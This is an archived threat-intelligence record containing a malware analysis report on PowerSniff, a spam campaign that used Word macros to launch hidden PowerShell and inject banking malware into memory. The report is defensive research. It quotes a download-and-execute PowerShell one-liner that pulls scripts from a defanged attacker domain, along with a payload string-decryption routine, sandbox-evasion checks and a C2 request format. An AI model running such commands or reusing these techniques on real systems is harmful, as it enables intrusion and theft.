{
	"id": "b3b101b7-774b-4326-bdd2-0629d5ac3328",
	"created_at": "2026-04-06T00:14:29.473842Z",
	"updated_at": "2026-04-10T03:23:51.416553Z",
	"deleted_at": null,
	"sha1_hash": "6d58f77547f237c815016693f3bf395be584a993",
	"title": "PowerSniff Malware Used in Macro-based Attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 596372,
	"plain_text": "PowerSniff Malware Used in Macro-based Attacks\r\nBy Josh Grunzweig, Brandon Levene\r\nPublished: 2016-03-11 · Archived: 2026-04-05 16:13:53 UTC\r\nIntroduction\r\nThe concept of file-less malware is not a new one. Families like Poweliks, which abuse Microsoft’s PowerShell,\r\nhave emerged in recent years and have garnered extensive attention due to their ability to compromise a system\r\nwhile leaving little or no trace of their presence to traditional forensic techniques.\r\nSystem administrators have lauded the power and versatility of PowerShell since version 2.0’s integration into\r\nWindows 7. Unfortunately, with such versatility comes the opportunity for abuse, specifically surrounding the\r\ncapability to write directly into memory of the host OS.\r\nTypically, file-less malware has been observed in the context of Exploit Kits such as Angler. Palo Alto Networks\r\nhas observed a recent high-threat spam campaign that is serving malicious macro documents used to execute\r\nPowerShell scripts which inject malware similar to the Ursnif family directly into memory. We call the malware\r\nPowerSniff.\r\nInfection\r\nFirst, victims are presented with an email similar to the image below.\r\nFigure 1 Redacted email containing malicious Word document\r\nAt the time of writing, Palo Alto Networks has observed roughly 1500 emails sent using a variety of filenames.\r\nThe majority of these emails contain specific information about the victim’s company, such as their phone\r\nnumber, physical address, as well as the name of the individual. 
This additional information is not typically\r\nhttps://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/\r\nPage 1 of 7\n\nincluded in widespread spam campaigns, and can often provide a sense of trust when seen by the victim, which in\r\nturn may lead to a higher number of opened attachments.\r\nThe following examples of subject names have been witnessed in this campaign:\r\n[Name], Please validate [Something] Gift Card from [Place]\r\n[Name], Please validate this [Name] Gift Voucher\r\n[Name], Please close this unpaid obligation #[Numbers]\r\n[Name], New Reservation at [Place]\r\n[Name], Please settle this unpaid balance [ID|Ref].[Numbers]\r\n[Name], Please settle this overlooked payment [ID|Ref].[Numbers]\r\nAdditionally, the United States appears to be primarily affected by this threat, as shown in the AutoFocus map\r\nbelow:\r\nFigure 2 AutoFocus view of attempted infections based on geographic location\r\nWhile no specific industry has been targeted by this campaign, it appears as though the Professional, Hospitality,\r\nand Manufacturing industries have witnessed these emails most often.\r\nFigure 3 AutoFocus view of attempted infections based on industry\r\nMalicious Attachment\r\nIn the event a victim opens the malicious Microsoft Word document attached within the email, they will be\r\nsubjected to a malicious macro contained within this file. The following example macro attempts to execute when\r\nthe document initially opens. 
Depending on the security settings of Microsoft Word, victims may need to\r\nexplicitly enable the macro to run.\r\nFigure 4 Malicious macro embedded in Microsoft Word document\r\nThis macro will invoke the WMI service to spawn a hidden instance of powershell.exe with the following\r\narguments (The URLs have been defanged for safety):\r\npowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c if ([IntPtr]::size -eq\r\n4) {(new-object Net.WebClient).DownloadString('http://rabbitons[.]pw/cache') | iex } else {(new-object\r\nNet.WebClient).DownloadString('http://rabbitons[.]pw/css') | iex}\r\nReaders may notice an if/else statement that is the result of a check against the size of the IntPtr object type. On\r\n32-bit instances of Microsoft Windows, this object will have a size of 4, versus a 64-bit operating system, which\r\nhas a size of 8. This particular check is a quick way for the attackers to determine if they are running on a 32-bit or\r\n64-bit operating system. In the event they are running on a 32-bit system, they will download and execute the file\r\nlocated at the ‘/cache’ URI. Alternatively, they will download and execute the file located at the ‘/css’ URI.\r\nPayload\r\nThe downloaded file is a PowerShell script that contains shellcode, which is subsequently decoded and executed,\r\nas seen in the following image.\r\nFigure 5 PowerShell payload downloaded by malware\r\nThis shellcode, once executed, decrypts and executes an embedded payload. 
This embedded payload begins by\r\ndecrypting a number of strings using the following algorithm, demonstrated in Python:\r\ndef decrypt(data, seed):\r\n    out = \"\"\r\n    for d in data:\r\n        byte = (ord(d)^seed) \u0026 0xFF\r\n        out += chr(byte)\r\n        seed = (0x19660D * seed + 0x3C6EF35F) \u0026 0xFFFFFFFF\r\n    return out\r\nFor this particular sample (SHA256:\r\n74ec24b5d08266d86c59718a4a476cfa5d220b7b3c8cc594d4b9efc03e8bee0d), the malware uses a seed value of\r\n0xDDBC9D5B. After string decryption completes, the payload performs a number of actions in an attempt to\r\ndetermine if it is running within a virtualized environment or sandbox.\r\nExamples include looking for the following usernames:\r\nMALTEST\r\nTEQUILABOOMBOOM\r\nSANDBOX\r\nVIRUS\r\nMALWARE\r\nThe payload also checks for the presence of the following libraries:\r\nsbiedll.dll\r\ndbghelp.dll\r\napi_log.dll\r\ndir_watch.dll\r\npstorec.dll\r\nvmERROR.dll\r\nwpespy.dll\r\nPrxDrvPE.dll\r\nPrxDrvPE64.dll\r\nOther simple checks, such as a call to IsDebuggerPresent(), are also performed.\r\nThe payload proceeds to perform reconnaissance against the victim host by executing an ‘ipconfig -all’ in a new\r\nprocess and inspecting the results. The malware specifically looks for the absence of the following strings:\r\nschool\r\nhospital\r\ncolledge\r\nhealth\r\nNURSE\r\nIf these strings are not discovered, it will proceed to check the cached URLs on the victim machine against the\r\nfollowing list:\r\nCitrix\r\nXenApp\r\ndana-na\r\nIf one of these strings, or any of a short list of financial institution websites is found in the cache, this victim\r\nmachine is identified as being interesting to the attackers, and will be marked with a type of ‘666’ in subsequent\r\nHTTP requests. 
Additionally, the malware will take the output of the ‘net view’ command and look for the absence\r\nof the following strings:\r\nTEACHER\r\nSTUDENT\r\nSCHOOLBOARD\r\nPEDIATRICS\r\nORTHOPED\r\nIt will also look for the presence of the following strings:\r\nPOS\r\nSTORE\r\nSHOP\r\nSALE\r\nIf these conditions are met, the victim machine will be identified as interesting, and marked with a type of ‘666’.\r\nAlternatively, if none of the previous conditions are met, the payload will mark the victim with a type of ‘555’.\r\nTo summarize these checks, it would appear as though this malware is attempting to actively avoid healthcare\r\nand education machines, as well as target point of sale instances and machines that conduct financial transactions.\r\nSimilar techniques were witnessed in a malware family named ‘Ursnif’ in mid-2015.\r\nAfter this reconnaissance has been performed, the malware will make an HTTP GET request to one of the\r\nembedded C2 servers, using the following format:\r\n/yuppi/?user=%08x%08x%08x%08x\u0026id=%u\u0026ver=%u\u0026os=%lu\u0026os2=%lu\u0026host=%u\u0026k=%lu\u0026type=%u\r\nThe ‘type’ variable contains the ‘555’ or ‘666’ previously discussed. The ‘id’ and ‘ver’ variables are hardcoded.\r\nThis particular sample used values of 24 and 123 respectively. The ‘k’ parameter is used as a decryption seed in\r\nthe C2 server’s response. In the event the C2 server is responsive, it will return an encrypted DLL. This DLL can\r\nbe decrypted using the same decryption previously discussed, using the seed value located in the ‘k’ parameter.\r\nThis DLL is then temporarily written to disk in the following location:\r\n%%userprofile%%\\\\AppData\\\\LocalLow\\\\[random].db\r\nAfter being written to disk, it will be executed using a call to rundll32.exe. The exported function of ‘Register’ is\r\nused when loading this malicious DLL. 
No C2 servers were responsive at the time of analysis.\r\nConclusion and Acknowledgements\r\nThis widespread spam campaign has been witnessed in the past week. Due to the target-specific details contained\r\nwithin the spam emails and the use of memory-resident malware, this particular campaign should be treated as a\r\nhigh threat. As this malware relies on malicious macros within Microsoft Word documents, users should ensure\r\nthat macros are not enabled by default and should be wary of opening any macros in files received from untrusted\r\nsources.\r\nPalo Alto Networks WildFire customers are protected against this threat, as all encountered files have been\r\ncorrectly flagged as malicious. Additionally, all C2 domains currently encountered have also been marked\r\nmalicious. AutoFocus users can identify this malware using the PowerSniff tag.\r\nThe researchers would like to thank Cert.pl’s @maciekkotowicz for his excellent analysis of the configuration\r\ndata of the malware.\r\nIndicators of Compromise\r\nSHA256 Hashes\r\nCommand and Control Servers\r\nSource: https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/"
	],
	"report_names": [
		"powersniff-malware-used-in-macro-based-attacks"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434469,
	"ts_updated_at": 1775791431,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6d58f77547f237c815016693f3bf395be584a993.pdf",
		"text": "https://archive.orkl.eu/6d58f77547f237c815016693f3bf395be584a993.txt",
		"img": "https://archive.orkl.eu/6d58f77547f237c815016693f3bf395be584a993.jpg"
	}
}